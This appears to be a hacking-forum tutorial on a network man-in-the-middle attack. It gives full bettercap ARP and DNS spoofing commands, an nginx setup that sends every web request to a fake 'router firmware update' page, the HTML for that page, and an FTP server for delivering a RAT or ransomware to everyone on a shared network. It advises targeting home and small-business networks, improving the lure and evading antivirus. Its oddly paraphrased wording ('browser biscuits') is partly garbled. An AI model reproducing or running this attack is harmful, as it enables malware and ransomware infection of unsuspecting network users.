a) Employ a recently created Kali VM between utilising tools to avert complications!
b) This strategy of assault currently operates patchily. Comprehend that nothing shall be unerring at 100%, but this shall afford you the most favourable likelihood.
c) Employ a novel Private window when proffering trials on your targeted contraption or delete your browser biscuits and conserved data subsequent to accessing your counterfeit Access Point. These assaults are being executed for the initial occasion against your objectives, which shall operate as predicted; however, when collating trials, numerous individuals encounter quandaries when employing the identical browser repeatedly, resulting in diminished efficacy. Ensure you utilise a New Private browser!
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
INTRODUCTION
With this succeeding assault, we intend to intercept all web requests, re-directing inhabitants within the same network as ourselves to our internetwork server. Our objective for this assault is to thoroughly compromise everyone's internetwork relationship who shares a network connection with ourselves. You may either target a single individual within the network or the entire network.
The primary objective of this attack is to coerce people to navigate to our designed web server, presenting them our premeditated attack landing webpage for the delivery of malware, ransomware or phishing endeavours.
We comprehend that since we are intercepting all web requests, we must convey the malevolent software through a differing protocol, permitting individuals to download it. Recognising they would endeavour to download ransomware.exe through HTTP/HTTPS, they will consistently be presented our landing page instead of genuinely acquiring your malware. For such reason, we shall transmit our malevolent software through FTP.
The inhabitants on the network relinquished internetwork connectivity; you emerged, connected to the network, and subsequently, their internetwork relationship ceased to function. It is at this moment that your assault prepares for them. Aforementioned, you should deliberate on augmenting your investments in Wi-Fi hacking apparatus by acquiring supplemental Alfa networks cards and suitable antennas.
We aim to intercept all web browser petitions, compelling every inhabitant within the network to be redirected to our internetwork server, tempting them to download our malevolent software. The exemplar below is a simplistic illustration but shall be modified to accommodate your intended objectives. As hitherto mentioned, you are encouraged to mould these assaults to match the individuals you pursue and to social engineer them into acquiring your malicious software.
PREREQUISITES
- DoS the WiFi Router
- Wifipumpkin3
- Your RAT, Ransomware, Malware, etc.
- Bettercap.
(If one fails to access a network, a Denial of Service (DoS) assault can be executed to incapacitate the router, employing wifipumpkin3 to facilitate the distribution of our malevolent software).
PROCESS GUIDE
Open a Terminal window within Kali:
Code: Select all
cd /var/www/htmlCode: Select all
sudo gedit index.htmlCopy and paste the given HTML code into the file and save. Exit the file. Ensure to substitute "Wi-Fi Router name" and "XY" with the desired parameters.
<head>
<title>WiFi Router Name</title>
<style>
<body, ul, li { font-family:Arial, Helvetica, sans-serif; font-size:14px; color:#737373; margin:0; padding:0;} .content { padding: 20px 15px 15px 40px; width: 500px; margin: 70px auto 6px auto; border: #D52B1E solid 2px;} .blocking { border-top: #D52B1E solid 2px; border-bottom: #D52B1E solid 2px;} .title { font-size: 24px; border-bottom: #ccc solid 1px; padding-bottom:15px; margin-bottom:15px;} .details li { list-style: none; padding: 4px 0;} .footer { color: #6d90e7; font-size: 14px; width: 540px; margin: 0 auto; text-align:right; } </style>
</head>
<body>
<center>
<div class="content">
<div class="title" id="msg_title"><b>WiFi Router Firmware Update Required</b></div>
<ul class="detailia">
<div id="main">
<div id="msg">
<li><b>Internet access has been blocked for safety.<br><br> Please download and install the new critical firmware for XY router:<br> XY Router:</b><span class="url"><a href="Update.exe"><b>Firmware Update</b></a></span><b></b></li>
</div>
</ul>
</div>
<div class="footer">XY Router <b>Firmware Update</b></div>
</center>
</body>
</html>
For the "Update.exe", which represents your chosen Remote Access Trojan, Ransomware, etc., position them within the directory '/var/www/html'.
This method outlines the optimal approach for redirecting individuals towards a phishing or malware transportation webpage. Prior to implementation, it is pertinent to acknowledge the limitations of this attack, as each browser, Operating System, and user's behaviour differs.
To maximise the likelihood of steering users toward our phishing or malware transportation webpage, follow the ensuing sequence of commands.
Cease Apache2 and Nginx services via Terminal:
Code: Select all
sudo service apache2 stopCode: Select all
sudo service nginx stopCode: Select all
sudo rm /etc/nginx/sites-available/defaultCode: Select all
sudo rm /etc/nginx/sites-enabled/defaultCode: Select all
sudo gedit /etc/nginx/sites-available/defaultCopy and insert the standard setting (designated in yellow):
server {
listen 80 default_server;
root /var/www/html;
error_page 500 502 503 504 404 /index.html;
location = /index.html
{
internal;
}
server_tokens off;
index index.html index.php index.htm index.nginx-debian.html;
server_name _;
}
Code: Select all
sudo ln -s /etc/nginx/sites-available/default /etc/nginx/sites-enabled/Code: Select all
sudo service nginx restartUtilising this illustration, assume the assailant computer holds the IP address 192.168.2.100, while the intended objective bears the IP address 192.168.2.250.
Open a newly launched Terminal window within Kali:
Code: Select all
sudo service apache2 stopCode: Select all
sudo service nginx restartCode: Select all
sudo bettercapAll the below-mentioned instructions are to be inputted within the bettercap window interface:
Code: Select all
net.probe onPause for approximately half a minute until the network hosts are detected and revealed.
Code: Select all
net.probe offCode: Select all
net.showThis action will unveil the objectives present on the network; kindly prioritise focusing on the target's IP address.
Code: Select all
set arp.spoof.targets TARGET_IPFor the given example: set arp.spoof.targets 192.168.2.250
If desiring to assail the entire network: set arp.spoof.targets *
Code: Select all
set arp.spoof.fullduplex trueCode: Select all
set arp.spoof.internal trueCode: Select all
set https.proxy.sslstrip trueCode: Select all
set dns.spoof.domains *Code: Select all
set dns.spoof.address ATTACKER_IPFor the given example: set dns.spoof.address 192.168.2.100
Code: Select all
set dns.spoof.all trueCode: Select all
https.proxy onCode: Select all
arp.spoof onCode: Select all
dns.spoof onPreserve the bettercap window active and running.
This strategy presents a proficient opportunity to redirect individuals to one's phishing or malware transportation webpage. Nevertheless, understanding the shortcomings is crucial, as operating systems and browser behaviour vary. By and large, this tactic may dismantle most HTTPS websites, while web browsers frequently display warnings. HTTP requests shall be rerouted to the assailant's webpage, also mitigating pop-up alerts. Some browsers may intrinsically recommend the HTTP variant of entered terms, consequently assisting the victim to access the malicious web page.
It is imperative to assess this attack across multiple web browsers to discern the presentations for the intended victims.
To ensure a smooth distribution of malware in the future, modify the '/var/www/html/index.html' file to represent your chosen malware.
In this illustration, if the intended Ransomware is named "SpiderX.exe" place it within the directory /var/www/html, which serves as the web server directory. If implementing a RAT, transfer the said file to the identical directory ("/var/www/html") and adapt the index.html file to exhibit the RAT executable's proper filename.
We shall proceed to the /var/www/html directory in order to initiate an FTP server that disburses the contents of that folder. Additionally, we will revise the /var/www/html/index.html to depict the malware's executable name. By directing all network-related web activity, we permit the target to download the malicious software via FTP.
To accomplish this venture, open a newly launched Terminal window within Kali:
Code: Select all
cd /var/www/htmlCode: Select all
python3 -m pyftpdlib -wThis action will establish an FTP server on port 2121. Retain this window operative throughout the execution of the attack.
The pre-eminent command "python3 -m pyftpdlib -w" corresponds to the "python3 -m http.server 80" implementation, however, it facilitates FTP instead. Essentially, it furnishes a rudimentary, uncomplicated approach for initiating a FTP server without requiring configuration files and related nuisances. Scripting this process becomes possible depending on one's coding expertise.
Launch a new Terminal window within the Kali environment:
Code: Select all
sudo gedit /var/www/html/index.html
Amend "Update.exe" on line 19 to read "ftp://ATTACKER_IP:2121/YOUR_MALWARE_FILE.exe".
In the supplied demonstration:
Code: Select all
ftp://192.168.2.100:2121/SPIDERX.exeSave and close the '/var/www/html/index.html' file.
The attack configuration is now complete. In the future, it is advisable to commence the FTP server prior to running Bettercap.
This tactic aims to dismantle both HTTPS and HTTP sites the target attempts to access, ideally steering them towards the assailant's web server, housing the malware or ransomware available for FTP download. The stealthiness of this operation is relatively limited; for optimum success, devise a strategic approach punctuated by astute social engineering initiatives to compel network occupants to download the malicious files. Although the average user might remain oblivious of the hijacking, the plaintext nature of FTP renders executables susceptible to network traffic monitoring - a heightened concern in corporate environments. Carefully select your targets and execute cyber-attacks prudently, as the likelihood of home networks or small businesses monitoring network activity is minimal.
CONCLUSSION
The effectiveness of this operation hinges on the creativity and authenticity of the webpage redirecting individuals. If the webpage appears unrefined and reminiscent of amateur-hour coding, insecurity could arise. In contrast, when conducting such stratagems within small business or corporate networks, integrating company emblems alongside messages encouraging system upgrades – e.g., proposing a VPN programme for encrypted accessibility - enhances credibility. The webpage display must demonstrate professionalism, thereby bolstering legitimacy. Vigilance regarding spelling and grammatical mistakes is essential for success, as is the alignment of the redirection webpage with an aura of trustworthy authenticity.
It becomes apparent that numerous people may decline to download "Malware.exe," as web browsers might impede access to recognised malicious files. Please specify the type of malware acquired, whether a crypter has been purchased, the quality of ransomware, and its performance. While a challenge, securing a reliable malware arsenal is crucial, fostering personal development and upgrading resources is essential for comradeship and success.
Adjust your tactics according to the ever-evolving landscape and avoid confining reliance on .exe files, particularly for malware, as the risk of AV detection, code signature issues, and other associated challenges heightens.
In the event of a Man-in-the-Middle assault employing phishing endeavours or steering HSTS-enabled resources, lack of success is probable. While HTTPS traffic interception is feasible, recipients will encounter warnings requiring permissive action, thus rendering an efficient method of transporting them towards the repository hoarding your malware or ransomware. Transitioning victims to the locus where your malicious files alight offers the best course of action.
